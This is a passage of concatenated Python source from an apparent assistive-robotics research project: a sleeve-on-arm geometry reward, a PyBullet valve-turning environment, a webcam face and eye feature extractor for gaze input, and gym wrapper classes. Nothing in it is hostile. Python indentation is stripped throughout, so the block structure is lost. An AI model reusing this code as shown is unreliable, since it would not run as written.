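        # signed volumes of tetrahedra (q0, p0, p1, p2) and (q1, p0, p1, p2) have opposite
        # signs, and the crossing point lies inside the triangle iff the three tetrahedra
        # built from the segment and each triangle edge share the same sign.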
signed_volume = lambda a, b, c, d: (1.0/6.0) * np.dot(np.cross(b-a, c-a), d-a)
if np.sign(signed_volume(q0, p0, p1, p2)) != np.sign(signed_volume(q1, p0, p1, p2)):
if np.sign(signed_volume(q0, q1, p0, p1)) == np.sign(signed_volume(q0, q1, p1, p2)) == np.sign(signed_volume(q0, q1, p2, p0)):
return True
return False
def sleeve_on_arm_reward(self, triangle1_points, triangle2_points, human, hand_radius, elbow_radius, shoulder_radius):
shoulder_pos, shoulder_orient = p.getLinkState(human, 15, computeForwardKinematics=True, physicsClientId=self.id)[:2]
elbow_pos, elbow_orient = p.getLinkState(human, 17, computeForwardKinematics=True, physicsClientId=self.id)[:2]
wrist_pos, wrist_orient = p.getLinkState(human, 19, computeForwardKinematics=True, physicsClientId=self.id)[4:6]
# Use full length of arm, rather than from hand center to elbow center
wrist_pos, elbow_pos, shoulder_pos = np.array(wrist_pos), np.array(elbow_pos), np.array(shoulder_pos)
hand_end_pos = wrist_pos + (wrist_pos - elbow_pos) / np.linalg.norm(wrist_pos - elbow_pos) * hand_radius*2
elbow_end_pos = elbow_pos + (elbow_pos - wrist_pos) / np.linalg.norm(wrist_pos - elbow_pos) * elbow_radius
shoulder_end_pos = shoulder_pos + (shoulder_pos - elbow_pos) / np.linalg.norm(shoulder_pos - elbow_pos) * shoulder_radius
# Given the central axis of the arm, find the plane through the axis and one vector perpendicular to the axis
# and the plane through the axis and the second vector perpendicular to the other two.
# There must be points above and below both of these two planes
# https://math.stackexchange.com/questions/7931/point-below-a-plane
normal_forearm = hand_end_pos - elbow_end_pos
normal_forearm = normal_forearm / np.linalg.norm(normal_forearm)
# Normalized Tangent Vector, assumes arm axis not parallel to vector [1, 1, 0]
tangent_forearm = np.cross(np.array([1, 1, 0]), normal_forearm)
tangent_forearm = tangent_forearm / np.linalg.norm(tangent_forearm)
# Normalized Binormal_forearm or Bitangent_forearm vector
binormal_forearm = np.cross(tangent_forearm, normal_forearm)
binormal_forearm = binormal_forearm / np.linalg.norm(binormal_forearm)
# Check if at least one point exists above and below both planes
# v.dot(p - p0), p0 on plane, v is normal_forearm of a plane. v = tangent_forearm, v = binormal_forearm, p0 = elbow_end_pos
all_points = np.concatenate([triangle1_points, triangle2_points], axis=0)
tangent_forearm_points = np.dot(tangent_forearm, (all_points - elbow_end_pos).T)
binormal_forearm_points = np.dot(binormal_forearm, (all_points - elbow_end_pos).T)
points_above_below_forearm = np.any(tangent_forearm_points > 0) and np.any(tangent_forearm_points < 0) and np.any(binormal_forearm_points > 0) and np.any(binormal_forearm_points < 0)
normal_upperarm = elbow_end_pos - shoulder_end_pos
normal_upperarm = normal_upperarm / np.linalg.norm(normal_upperarm)
tangent_upperarm = np.cross(np.array([1, 1, 0]), normal_upperarm)
tangent_upperarm = tangent_upperarm / np.linalg.norm(tangent_upperarm)
binormal_upperarm = np.cross(tangent_upperarm, normal_upperarm)
binormal_upperarm = binormal_upperarm / np.linalg.norm(binormal_upperarm)
tangent_upperarm_points = np.dot(tangent_upperarm, (all_points - shoulder_end_pos).T)
binormal_upperarm_points = np.dot(binormal_upperarm, (all_points - shoulder_end_pos).T)
points_above_below_upperarm = np.any(tangent_upperarm_points > 0) and np.any(tangent_upperarm_points < 0) and np.any(binormal_upperarm_points > 0) and np.any(binormal_upperarm_points < 0)
# Check that the arm line segment intersects two different triangles defined by points around the sleeve.
# https://stackoverflow.com/questions/42740765/intersection-between-line-and-triangle-in-3d
forearm_intersects_triangle1 = self.line_intersects_triangle(triangle1_points[0], triangle1_points[1], triangle1_points[2], hand_end_pos, elbow_end_pos)
forearm_intersects_triangle2 = self.line_intersects_triangle(triangle2_points[0], triangle2_points[1], triangle2_points[2], hand_end_pos, elbow_end_pos)
upperarm_intersects_triangle1 = self.line_intersects_triangle(triangle1_points[0], triangle1_points[1], triangle1_points[2], elbow_end_pos, shoulder_end_pos)
upperarm_intersects_triangle2 = self.line_intersects_triangle(triangle2_points[0], triangle2_points[1], triangle2_points[2], elbow_end_pos, shoulder_end_pos)
sleeve_center = np.mean(all_points, axis=0)
distance_to_shoulder = np.linalg.norm(shoulder_end_pos - sleeve_center)
distance_to_elbow = np.linalg.norm(elbow_end_pos - sleeve_center)
distance_to_hand = np.linalg.norm(hand_end_pos - sleeve_center)
# Reward forward movement along the arm, away from the hand (pulling the sleeve onto the arm)
distance_along_forearm = np.linalg.norm(sleeve_center - hand_end_pos)
distance_along_upperarm = np.linalg.norm(sleeve_center - elbow_pos)
forearm_in_sleeve = points_above_below_forearm and (forearm_intersects_triangle1 or forearm_intersects_triangle2)
upperarm_in_sleeve = points_above_below_upperarm and (upperarm_intersects_triangle1 or upperarm_intersects_triangle2)
return forearm_in_sleeve, upperarm_in_sleeve, distance_along_forearm, distance_along_upperarm, distance_to_hand, distance_to_elbow, distance_to_shoulder, np.linalg.norm(hand_end_pos - elbow_end_pos), np.linalg.norm(elbow_pos - shoulder_pos)
```
#### File: assistive_gym/envs/valve.py
```python
from gym import spaces
import numpy as np
import pybullet as p
from .env import AssistiveEnv
from gym.utils import seeding
from collections import OrderedDict
import os
import time
reach_arena = (np.array([-.25, -.5, 1]), np.array([.6, .4, .2]))
default_orientation = p.getQuaternionFromEuler([0, 0, 0])
class ValveEnv(AssistiveEnv):
def __init__(self, robot_type='jaco', success_dist=.05, target_indices=None, session_goal=False, frame_skip=5,
capture_frames=False, stochastic=True, debug=False, min_error_threshold=np.pi / 16,
max_error_threshold=np.pi / 4, num_targets=None, use_rand_init_angle=True, term_cond=None,
term_thresh=20, preserve_angle=False, **kwargs):
super(ValveEnv, self).__init__(robot_type=robot_type, task='reaching', frame_skip=frame_skip, time_step=0.02,
action_robot_len=7, obs_robot_len=14)
obs_dim = 3 + 4 + 3 + 2 + 1 + 7 + 7
encoder_obs_dim = 3 + 2
if stochastic:
obs_dim += 3 # for valve pos
encoder_obs_dim += 3
self.observation_space = spaces.Box(-np.inf, np.inf, (obs_dim,), dtype=np.float32)
self.encoder_observation_space = spaces.Box(-np.inf, np.inf, (encoder_obs_dim,), dtype=np.float32)
self.num_targets = num_targets
self.success_dist = success_dist
self.debug = debug
self.stochastic = stochastic
self.goal_feat = ['target_angle'] # Just an FYI
self.feature_sizes = OrderedDict({'goal': 2})
self.session_goal = session_goal
self.use_rand_init_angle = use_rand_init_angle
if self.num_targets is not None:
self.target_angles = np.linspace(-np.pi, np.pi, self.num_targets, endpoint=False)
if not self.use_rand_init_angle:
self.target_angles = np.delete(self.target_angles, np.argwhere(self.target_angles == 0))
self.target_indices = np.arange(len(self.target_angles))
self.min_error_threshold = min_error_threshold
self.max_error_threshold = max_error_threshold
self.error_threshold = min_error_threshold
self.preserve_angle = preserve_angle
self.last_angle = None
self.wall_color = None
self.calibrate = False
self.term_cond = term_cond
self.term_thresh = term_thresh
self.n_success = 0 # number of consecutive steps in success condition
self.target_norm = .55
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
self.init_pos_random, _ = seeding.np_random(seed)
return [seed]
def step(self, action):
old_tool_pos = self.tool_pos
self.take_step(action, robot_arm='left', gains=self.config('robot_gains'), forces=self.config('robot_forces'))
obs = self._get_obs([0])
reward = np.exp(-np.abs(self.angle_diff(self.valve_angle, self.target_angle))) - 1
direction = np.zeros(3)
if self.task_success:
index = 0
self.n_success += 1
tracking_angle = self.valve_angle
else:
tracking_angle = self.valve_angle
if self.angle_diff(self.valve_angle, self.target_angle) > 0:
index = 1
tracking_angle = self.wrap_angle(tracking_angle - 2 * self.min_error_threshold)
else:
index = 2
tracking_angle = self.wrap_angle(tracking_angle + 2 * self.min_error_threshold)
self.n_success = 0
tracking_input = self.target_norm * np.array((-np.cos(tracking_angle), np.sin(tracking_angle))) + \
np.delete(self.valve_pos, 1)
direction[index] = 1
if self.n_success >= self.term_thresh:
color = [0, 1, 0, 1]
elif self.task_success:
color = [0, 0, 1, 1]
else:
color = [1, 0, 0, 1]
p.changeVisualShape(self.target_indicator, -1, rgbaColor=color)
info = {
'task_success': self.task_success,
'old_tool_pos': old_tool_pos,
'tool_pos': self.tool_pos,
'valve_pos': self.valve_pos,
'valve_angle': self.valve_angle,
'target_angle': self.target_angle,
'error_threshold': self.error_threshold,
'direction': direction,
'angle_error': self.angle_diff(self.valve_angle, self.target_angle),
'target_position': self.target_position,
'tracking_input': tracking_input
}
done = False
if self.term_cond == 'auto':
done = self.n_success >= self.term_thresh
elif self.term_cond == 'keyboard':
keys = p.getKeyboardEvents()
if self.n_success >= self.term_thresh and p.B3G_RETURN in keys and keys[p.B3G_RETURN] & p.KEY_WAS_TRIGGERED:
done = True
time.sleep(1)
info['feedback'] = True if done else -1
return obs, reward, done, info
def _get_obs(self, forces):
robot_joint_states = p.getJointStates(self.robot, jointIndices=self.robot_left_arm_joint_indices,
physicsClientId=self.id)
robot_joint_positions = np.array([x[0] for x in robot_joint_states])
robot_joint_velocities = np.array([x[1] for x in robot_joint_states])
angle_features = [np.sin(self.valve_angle), np.cos(self.valve_angle)]
obs = [self.tool_pos, self.tool_orient, self.tool_velocity,
angle_features, [self.valve_velocity],
robot_joint_positions, robot_joint_velocities
]
encoder_obs = [self.tool_pos, angle_features]
if self.stochastic:
obs.append(self.valve_pos)
encoder_obs.append(self.valve_pos)
robot_obs = dict(
raw_obs=np.concatenate(obs),
encoder_obs=np.concatenate(encoder_obs),
hindsight_goal=np.array([np.sin(self.valve_angle), np.cos(self.valve_angle)]),
goal=self.goal.copy(),
)
self.last_angle = self.valve_angle
return robot_obs
def update_curriculum(self, success):
if success:
self.error_threshold -= self.min_error_threshold
self.error_threshold = max(self.min_error_threshold, self.error_threshold)
else:
self.error_threshold += self.min_error_threshold
self.error_threshold = min(self.max_error_threshold, self.error_threshold)
def reset(self):
"""set up standard environment"""
self.setup_timing()
_human, self.wheelchair, self.robot, self.robot_lower_limits, self.robot_upper_limits, _human_lower_limits, \
_human_upper_limits, self.robot_right_arm_joint_indices, self.robot_left_arm_joint_indices, self.gender \
= self.world_creation.create_new_world(furniture_type='wheelchair', init_human=False,
static_human_base=True, human_impairment='random',
print_joints=False, gender='random')
self.robot_lower_limits = self.robot_lower_limits[self.robot_left_arm_joint_indices]
self.robot_upper_limits = self.robot_upper_limits[self.robot_left_arm_joint_indices]
self.reset_robot_joints()
wheelchair_pos, wheelchair_orient = p.getBasePositionAndOrientation(self.wheelchair, physicsClientId=self.id)
p.resetBasePositionAndOrientation(self.robot, np.array(wheelchair_pos) + np.array([-0.35, -0.3, 0.3]),
p.getQuaternionFromEuler([0, 0, -np.pi / 2.0], physicsClientId=self.id),
physicsClientId=self.id)
base_pos, base_orient = p.getBasePositionAndOrientation(self.robot, physicsClientId=self.id)
self.human_controllable_joint_indices = []
self.human_lower_limits = np.array([])
self.human_upper_limits = np.array([])
"""set up target and initial robot position"""
if not self.session_goal:
self.set_target_index() # instance override in demos
self.reset_noise()
self.init_robot_arm()
wall_collision = p.createCollisionShape(p.GEOM_BOX, halfExtents=[4, .1, 1])
wall_visual = p.createVisualShape(p.GEOM_BOX, halfExtents=[4, .1, 1], rgbaColor=self.wall_color)
wall_pos, wall_orient = np.array([0., -1.1, 1.]), np.array([0, 0, 0, 1])
if self.stochastic and not self.calibrate:
wall_pos = wall_pos + self.wall_noise
self.wall = p.createMultiBody(basePosition=wall_pos, baseOrientation=wall_orient,
baseCollisionShapeIndex=wall_collision, baseVisualShapeIndex=wall_visual,
physicsClientId=self.id)
valve_pos, valve_orient = p.multiplyTransforms(wall_pos, wall_orient, [0, 0.1, 0],
p.getQuaternionFromEuler([0, 0, 0]),
physicsClientId=self.id)
if self.stochastic:
valve_pos = np.array(valve_pos) + self.valve_pos_noise
self.valve = p.loadURDF(os.path.join(self.world_creation.directory, 'valve', 'valve.urdf'),
basePosition=valve_pos, useFixedBase=True,
baseOrientation=valve_orient, globalScaling=1,
physicsClientId=self.id)
if self.preserve_angle and self.last_angle is not None:
p.resetJointState(self.valve, 0, self.last_angle, physicsClientId=self.id)
elif self.use_rand_init_angle:
p.resetJointState(self.valve, 0, self.rand_init_angle, physicsClientId=self.id)
"""configure pybullet"""
p.setGravity(0, 0, 0, physicsClientId=self.id)
p.setPhysicsEngineParameter(numSubSteps=5, numSolverIterations=10, physicsClientId=self.id)
# Enable rendering
p.resetDebugVisualizerCamera(cameraDistance=.1, cameraYaw=180, cameraPitch=-10,
cameraTargetPosition=[0, -.3, 1.1], physicsClientId=self.id)
p.configureDebugVisualizer(p.COV_ENABLE_RENDERING, 1, physicsClientId=self.id)
self.goal = np.array([np.sin(self.target_angle), np.cos(self.target_angle)])
sphere_visual = p.createVisualShape(shapeType=p.GEOM_SPHERE, radius=0.1,
rgbaColor=[1, 0, 0, 1], physicsClientId=self.id)
target_coord = self.target_norm * np.array((-np.cos(self.target_angle), 0, np.sin(self.target_angle))) + \
valve_pos + [0, 0.105, 0]
self.target_indicator = p.createMultiBody(baseMass=0.0, baseCollisionShapeIndex=-1,
baseVisualShapeIndex=sphere_visual, basePosition=target_coord,
useMaximalCoordinates=False, physicsClientId=self.id)
self.n_success = 0
obs = self._get_obs([0])
return obs
def init_start_pos(self):
"""exchange this function for curriculum"""
self.init_pos = np.array([0, -.5, 1.1])
self.init_pos += self.init_pos_random.uniform([-0.1, -0.1, -0.1], [0.1, 0.1, 0.1], size=3)
def init_robot_arm(self):
self.init_start_pos()
init_orient = p.getQuaternionFromEuler(np.array([0, np.pi / 2.0, 0]), physicsClientId=self.id)
self.util.ik_random_restarts(self.robot, 11, self.init_pos, init_orient, self.world_creation,
self.robot_left_arm_joint_indices, self.robot_lower_limits,
self.robot_upper_limits,
ik_indices=[0, 1, 2, 3, 4, 5, 6], max_iterations=100,
max_ik_random_restarts=10, random_restart_threshold=0.03, step_sim=True)
self.world_creation.set_gripper_open_position(self.robot, position=1, left=True, set_instantly=True)
self.tool = self.world_creation.init_tool(self.robot, mesh_scale=[0.001] * 3, pos_offset=[0, 0, 0.02],
orient_offset=p.getQuaternionFromEuler([0, -np.pi / 2.0, 0],
physicsClientId=self.id),
maximal=False)
def set_target_index(self, index=None):
if self.num_targets is not None:
if index is None:
self.target_index = self.np_random.choice(self.target_indices)
else:
self.target_index = index
def reset_noise(self):
self.rand_init_angle = (self.np_random.rand() - 0.5) * 2 * np.pi
# init angle either self.rand_init_angle or 0
if self.preserve_angle and self.last_angle is not None:
avoid = self.last_angle
elif self.use_rand_init_angle:
avoid = self.rand_init_angle
else:
avoid = 0
self.rand_angle = None
while self.rand_angle is None or np.abs(self.angle_diff(self.rand_angle, avoid)) < self.error_threshold:
self.rand_angle = (self.np_random.rand() - 0.5) * 2 * np.pi
if self.stochastic:
self.valve_pos_noise = np.array([self.np_random.uniform(-.05, .05), 0, 0])
# no y noise so can use 2D coordinates only for goal estimation
self.wall_noise = np.zeros(3)
def wrong_goal_reached(self):
return False
def calibrate_mode(self, calibrate, split):
self.wall_color = [255 / 255, 187 / 255, 120 / 255, 1] if calibrate else None
self.calibrate = calibrate
@property
def tool_pos(self):
return np.array(p.getBasePositionAndOrientation(self.tool, physicsClientId=self.id)[0])
@property
def tool_orient(self):
return np.array(p.getBasePositionAndOrientation(self.tool, physicsClientId=self.id)[1])
@property
def tool_velocity(self):
return np.array(p.getBaseVelocity(self.tool, physicsClientId=self.id)[0])
@property
def valve_pos(self):
return p.getLinkState(self.valve, 0, computeForwardKinematics=True, physicsClientId=self.id)[0]
@property
def valve_angle(self):
return self.wrap_angle(p.getJointStates(self.valve, jointIndices=[0], physicsClientId=self.id)[0][0])
@property
def valve_velocity(self):
return p.getJointStates(self.valve, jointIndices=[0], physicsClientId=self.id)[0][1]
@property
def target_angle(self):
return self.rand_angle if self.num_targets is None or not self.calibrate else \
self.wrap_angle(self.target_angles[self.target_index])
@property
def target_position(self):
return np.delete(np.array(p.getBasePositionAndOrientation(self.target_indicator, physicsClientId=self.id)[0]), 1)
def wrap_angle(self, angle):
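        # wraps the angle into the interval [-pi, pi)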
return angle - 2 * np.pi * np.floor((angle + np.pi) / (2 * np.pi))
def angle_diff(self, angle1, angle2):
a = angle1 - angle2
if a > np.pi:
a -= 2 * np.pi
elif a < -np.pi:
a += 2 * np.pi
return a
@property
def task_success(self):
return np.abs(self.angle_diff(self.valve_angle, self.target_angle)) < self.error_threshold
class ValveJacoEnv(ValveEnv):
def __init__(self, **kwargs):
super().__init__(robot_type='jaco', **kwargs)
```
#### File: image/gaze_capture/face_processor.py
```python
import dlib
import cv2
import math
import numpy as np
from .ITrackerData import loadMetadata
import os
from pathlib import Path
main_dir = str(Path(__file__).resolve().parents[1])
class FaceProcessor:
def __init__(self, predictor_path):
self.face_detector = dlib.get_frontal_face_detector()
self.predictor = dlib.shape_predictor(predictor_path)
self.img_dim = 224
self.face_grid_dim = 25
self.left_eye_points = [42, 43, 44, 45, 46, 47]
self.right_eye_points = [36, 37, 38, 39, 40, 41]
self.face_mean = loadMetadata(os.path.join(main_dir,'gaze_capture','model_files','mean_face_224.mat'),
silent=True)['image_mean']
self.left_eye_mean = loadMetadata(os.path.join(main_dir,'gaze_capture','model_files','mean_left_224.mat'),
silent=True)['image_mean']
self.right_eye_mean = loadMetadata(os.path.join(main_dir,'gaze_capture','model_files','mean_right_224.mat'),
silent=True)['image_mean']
def get_gaze_features(self, frame):
height, width = frame.shape[:2]
diff = height - width
# crop image to square
if diff > 0:
frame = frame[math.floor(diff / 2): -math.ceil(diff / 2)]
elif diff < 0:
frame = frame[:, -math.floor(diff / 2): math.ceil(diff / 2)]
gs_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
face_box = self._get_facial_detections(gs_frame)
if face_box is None:
return None
face = self._get_face(frame, face_box)
if face is None:
return None
face = (face - self.face_mean) / 255
face_grid = self._get_face_grid(frame, face_box)
landmarks = self.predictor(gs_frame, face_box)
og_left_eye = self._get_eye(frame, landmarks, self.left_eye_points)
og_right_eye = self._get_eye(frame, landmarks, self.right_eye_points)
left_eye = (og_left_eye - self.left_eye_mean) / 255
right_eye = (og_right_eye - self.right_eye_mean) / 255
face = np.moveaxis(face, -1, 0)
left_eye = np.moveaxis(left_eye, -1, 0)
right_eye = np.moveaxis(right_eye, -1, 0)
return face, left_eye, right_eye, face_grid, # og_left_eye, og_right_eye
def _get_face(self, frame, face_box):
try:
face = frame[face_box.top(): face_box.bottom(), face_box.left(): face_box.right()]
face = cv2.resize(face, (self.img_dim, self.img_dim))
face = np.flip(face, axis=2)
except:
return None
return face
def _get_face_grid(self, frame, face_box):
frame_dim = len(frame)
top = math.floor(face_box.top() * self.face_grid_dim / frame_dim)
bottom = math.ceil(face_box.bottom() * self.face_grid_dim / frame_dim)
left = math.floor(face_box.left() * self.face_grid_dim / frame_dim)
right = math.ceil(face_box.right() * self.face_grid_dim / frame_dim)
face_grid = np.zeros((self.face_grid_dim, self.face_grid_dim))
face_grid[top: bottom, left: right] = 1
return face_grid
def _get_eye(self, frame, landmarks, points):
eye_landmarks = self._get_landmarks(landmarks, points)
left, top, width, height = cv2.boundingRect(eye_landmarks)
w_margin = int(width / 3)
h_margin = (width + 2 * w_margin - height) / 2
top_margin = math.ceil(h_margin)
bot_margin = math.floor(h_margin)
eye = frame[top - top_margin: top + height + bot_margin, left - w_margin: left + width + w_margin]
eye = cv2.resize(eye, (self.img_dim, self.img_dim))
eye = np.flip(eye, axis=2)
return eye
def get_eye_aspect_ratio(self, frame):
gs_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
face_box = self._get_facial_detections(gs_frame)
if face_box is None:
return None
landmarks = self.predictor(gs_frame, face_box)
left_eye_landmarks = self._get_landmarks(landmarks, self.left_eye_points)
right_eye_landmarks = self._get_landmarks(landmarks, self.right_eye_points)
left_eye_aspect_ratio = self._eye_aspect_ratio(left_eye_landmarks)
right_eye_aspect_ratio = self._eye_aspect_ratio(right_eye_landmarks)
return (left_eye_aspect_ratio + right_eye_aspect_ratio) / 2
def _get_facial_detections(self, gs_frame):
detections = self.face_detector(gs_frame)
if len(detections) == 0:
return None
return detections[0]
@staticmethod
def _get_landmarks(landmarks, points):
return np.array([(landmarks.part(point).x, landmarks.part(point).y) for point in points])
@staticmethod
def _eye_aspect_ratio(eye_landmarks):
v_1 = np.linalg.norm(eye_landmarks[1] - eye_landmarks[5])
v_2 = np.linalg.norm(eye_landmarks[2] - eye_landmarks[4])
h = np.linalg.norm(eye_landmarks[0] - eye_landmarks[3])
return (v_1 + v_2) / (2 * h)
```
#### File: rl/misc/env_wrapper.py
```python
from functools import reduce
import os
from pathlib import Path
import h5py
from collections import deque
import numpy as np
from numpy.random import default_rng
from numpy.linalg import norm
import pybullet as p
import assistive_gym as ag
from gym import spaces, Env
import cv2
import torch
from gaze_capture.face_processor import FaceProcessor
from gaze_capture.ITrackerModel import ITrackerModel
import threading
from rl.oracles import *
main_dir = str(Path(__file__).resolve().parents[2])
def default_overhead(config):
factory_map = {
'session': session_factory,
}
factories = [factory_map[factory] for factory in config['factories']]
factories = [action_factory] + factories
wrapper = reduce(lambda value, func: func(value), factories, LibraryWrapper)
class Overhead(wrapper):
def __init__(self, config):
super().__init__(config)
self.rng = default_rng(config['seedid'])
adapt_map = {
'oracle': oracle,
'static_gaze': static_gaze,
'real_gaze': real_gaze,
'joint': joint,
'sim_keyboard': sim_keyboard,
'keyboard': keyboard,
'goal': goal,
'reward': reward,
'sim_target': sim_target,
'dict_to_array': dict_to_array,
}
self.adapts = [adapt_map[adapt] for adapt in config['adapts']]
self.adapts = [adapt(self, config) for adapt in self.adapts]
self.adapt_step = lambda obs, r, done, info: reduce(lambda sub_tran, adapt: adapt._step(*sub_tran),
self.adapts, (obs, r, done, info))
self.adapt_reset = lambda obs, info=None: reduce(lambda obs, adapt: adapt._reset(obs, info), self.adapts,
(obs))
def step(self, action):
tran = super().step(action)
tran = self.adapt_step(*tran)
return tran
def reset(self):
obs = super().reset()
obs = self.adapt_reset(obs)
return obs
return Overhead(config)
class LibraryWrapper(Env):
def __init__(self, config):
self.env_name = config['env_name']
self.base_env = {
"OneSwitch": ag.OneSwitchJacoEnv,
"Bottle": ag.BottleJacoEnv,
"Valve": ag.ValveJacoEnv,
"BlockPush": ag.BlockPushJacoEnv,
}[config['env_name']]
self.base_env = self.base_env(**config['env_kwargs'])
self.observation_space = self.base_env.observation_space
self.encoder_observation_space = None
if hasattr(self.base_env, 'encoder_observation_space'):
self.encoder_observation_space = self.base_env.encoder_observation_space
self.action_space = self.base_env.action_space
self.feature_sizes = self.base_env.feature_sizes
self.terminate_on_failure = config['terminate_on_failure']
def step(self, action):
obs, r, done, info = self.base_env.step(action)
if self.terminate_on_failure and hasattr(self.base_env, 'wrong_goal_reached'):
done = done or self.base_env.wrong_goal_reached()
return obs, r, done, info
def reset(self):
return self.base_env.reset()
def render(self, mode=None, **kwargs):
return self.base_env.render(mode)
def seed(self, value):
self.base_env.seed(value)
def close(self):
self.base_env.close()
def get_base_env(self):
return self.base_env
def action_factory(base):
class Action(base):
def __init__(self, config):
super().__init__(config)
self.action_type = config['action_type']
self.action_space = {
"trajectory": spaces.Box(-.1, .1, (3,)),
"joint": spaces.Box(-.25, .25, (7,)),
"disc_traj": spaces.Box(0, 1, (6,)),
}[config['action_type']]
self.translate = {
'trajectory': self.trajectory,
'joint': self.joint,
'disc_traj': self.disc_traj,
}[config['action_type']]
self.smooth_alpha = config['smooth_alpha']
def joint(self, action, info={}):
clip_by_norm = lambda traj, limit: traj / max(1e-4, norm(traj)) * np.clip(norm(traj), None, limit)
action = clip_by_norm(action, .25)
info['joint'] = action
return action, info
def target(self, coor, info={}):
base_env = self.base_env
info['target'] = coor
joint_states = p.getJointStates(base_env.robot, jointIndices=base_env.robot_left_arm_joint_indices,
physicsClientId=base_env.id)
joint_positions = np.array([x[0] for x in joint_states])
link_pos = p.getLinkState(base_env.robot, 13, computeForwardKinematics=True, physicsClientId=base_env.id)[0]
new_pos = np.array(coor) + np.array(link_pos) - base_env.tool_pos
new_joint_positions = np.array(
p.calculateInverseKinematics(base_env.robot, 13, new_pos, physicsClientId=base_env.id))
new_joint_positions = new_joint_positions[:7]
action = new_joint_positions - joint_positions
return self.joint(action, info)
def trajectory(self, traj, info={}):
clip_by_norm = lambda traj, min_l=None, max_l=None: traj / max(1e-4, norm(traj)) * np.clip(norm(traj),
min_l, max_l)
traj = clip_by_norm(traj, .07, .1)
info['trajectory'] = traj
return self.target(self.base_env.tool_pos + traj, info)
def disc_traj(self, onehot, info={}):
info['disc_traj'] = onehot
index = np.argmax(onehot)
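            # one-hot index 0-5 maps to a unit step along -x, +x, -y, +y, -z, +z respectively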
traj = [
np.array((-1, 0, 0)),
np.array((1, 0, 0)),
np.array((0, -1, 0)),
np.array((0, 1, 0)),
np.array((0, 0, -1)),
np.array((0, 0, 1)),
][index]
return self.trajectory(traj, info)
def step(self, action):
action, ainfo = self.translate(action)
obs, r, done, info = super().step(action)
info = {**info, **ainfo}
return obs, r, done, info
def reset(self):
self.action = np.zeros(7)
return super().reset()
return Action
def session_factory(base):
class Session(base):
def __init__(self, config):
config['env_kwargs']['session_goal'] = True
super().__init__(config)
self.goal_reached = False
def new_goal(self, index=None):
self.base_env.set_target_index(index)
self.base_env.reset_noise()
self.goal_reached = False
def step(self, action):
o, r, d, info = super().step(action)
if info['task_success']:
self.goal_reached = True
return o, r, d, info
def reset(self):
return super().reset()
return Session
class array_to_dict:
def __init__(self, master_env, config):
pass
def _step(self, obs, r, done, info):
if not isinstance(obs, dict):
obs = {'raw_obs': obs}
return obs, r, done, info
def _reset(self, obs, info=None):
if not isinstance(obs, dict):
obs = {'raw_obs': obs}
return obs
class goal:
"""
Chooses what features from info to add to obs
"""
def __init__(self, master_env, config):
self.env_name = master_env.env_name
self.master_env = master_env
self.goal_feat_func = dict(
Kitchen=lambda info: [info['target1_pos'], info['orders'], info['tasks']],
Bottle=None,
OneSwitch=None,
Valve=None,
BlockPush=lambda info: [info['ground_truth']]
)[self.env_name]
self.hindsight_feat = dict(
Kitchen={'tool_pos': 3, 'orders': 2, 'tasks': 6},
Bottle={'tool_pos': 3},
OneSwitch={'tool_pos': 3},
Valve={'valve_angle': 2},
BlockPush={'ground_truth': 3}
)[self.env_name]
master_env.goal_size = self.goal_size = sum(self.hindsight_feat.values())
def _step(self, obs, r, done, info):
if self.goal_feat_func is not None:
obs['goal'] = np.concatenate([np.ravel(state_component) for state_component in self.goal_feat_func(info)])
hindsight_feat = np.concatenate(
[np.ravel(info[state_component]) for state_component in self.hindsight_feat.keys()])
obs['hindsight_goal'] = hindsight_feat
return obs, r, done, info
def _reset(self, obs, info=None):
if self.goal_feat_func is not None:
obs['goal'] = np.zeros(self.goal_size)
obs['hindsight_goal'] = np.zeros(self.goal_size)
return obs
class static_gaze:
def __init__(self, master_env, config):
self.gaze_dim = config['gaze_dim']
del master_env.feature_sizes['goal']
master_env.feature_sizes['gaze_features'] = self.gaze_dim
self.env_name = master_env.env_name
self.master_env = master_env
with h5py.File(os.path.join(str(Path(__file__).resolve().parents[2]), 'gaze_capture', 'gaze_data',
config['gaze_path']), 'r') as gaze_data:
self.gaze_dataset = {k: v[()] for k, v in gaze_data.items()}
self.per_step = True
def sample_gaze(self, index):
unique_target_index = index
data = self.gaze_dataset[str(unique_target_index)]
return self.master_env.rng.choice(data)
def _step(self, obs, r, done, info):
if self.per_step:
if self.env_name == 'OneSwitch':
self.static_gaze = self.sample_gaze(self.master_env.base_env.target_indices.index(info['unique_index']))
elif self.env_name == 'Bottle':
self.static_gaze = self.sample_gaze(info['unique_index'])
obs['gaze_features'] = self.static_gaze
return obs, r, done, info
def _reset(self, obs, info=None):
if self.env_name == 'OneSwitch':
index = self.master_env.base_env.target_indices.index(self.master_env.base_env.unique_index)
elif self.env_name == 'Bottle':
index = self.master_env.base_env.unique_index
obs['gaze_features'] = self.static_gaze = self.sample_gaze(index)
return obs
class real_gaze:
def __init__(self, master_env, config):
self.gaze_dim = config['gaze_dim']
del master_env.feature_sizes['goal']
master_env.feature_sizes['gaze_features'] = self.gaze_dim
self.env_name = master_env.env_name
self.master_env = master_env
self.webcam = cv2.VideoCapture(0)
self.face_processor = FaceProcessor(
os.path.join(main_dir, 'gaze_capture', 'model_files', 'shape_predictor_68_face_landmarks.dat'))
self.i_tracker = ITrackerModel()
if torch.cuda.is_available():
self.device = torch.device("cuda:0")
self.i_tracker.cuda()
state = torch.load(os.path.join(main_dir, 'gaze_capture', 'checkpoint.pth.tar'))['state_dict']
else:
self.device = "cpu"
state = torch.load(os.path.join(main_dir, 'gaze_capture', 'checkpoint.pth.tar'),
map_location=torch.device(ptu.device))['state_dict']
self.i_tracker.load_state_dict(state, strict=False)
self.gaze = np.zeros(self.gaze_dim)
self.gaze_lock = threading.Lock()
self.gaze_thread = None
def record_gaze(self):
_, frame = self.webcam.read()
features = self.face_processor.get_gaze_features(frame)
if features is None:
print("GAZE NOT CAPTURED")
gaze = np.zeros(self.gaze_dim)
else:
i_tracker_input = [torch.from_numpy(feature)[None].float().to(self.device) for feature in features]
i_tracker_features = self.i_tracker(*i_tracker_input).detach().cpu().numpy()
gaze = i_tracker_features[0]
self.gaze_lock.acquire()
self.gaze = gaze
self.gaze_lock.release()
def restart_gaze_thread(self):
if self.gaze_thread is None or not self.gaze_thread.is_alive():
self.gaze_thread = threading.Thread(target=self.record_gaze, name='gaze_thread')
self.gaze_thread.start()
def update_obs(self, obs):
self.gaze_lock.acquire()
obs['gaze_features'] = self.gaze
self.gaze_lock.release()
def _step(self, obs, r, done, info):
self.restart_gaze_thread()
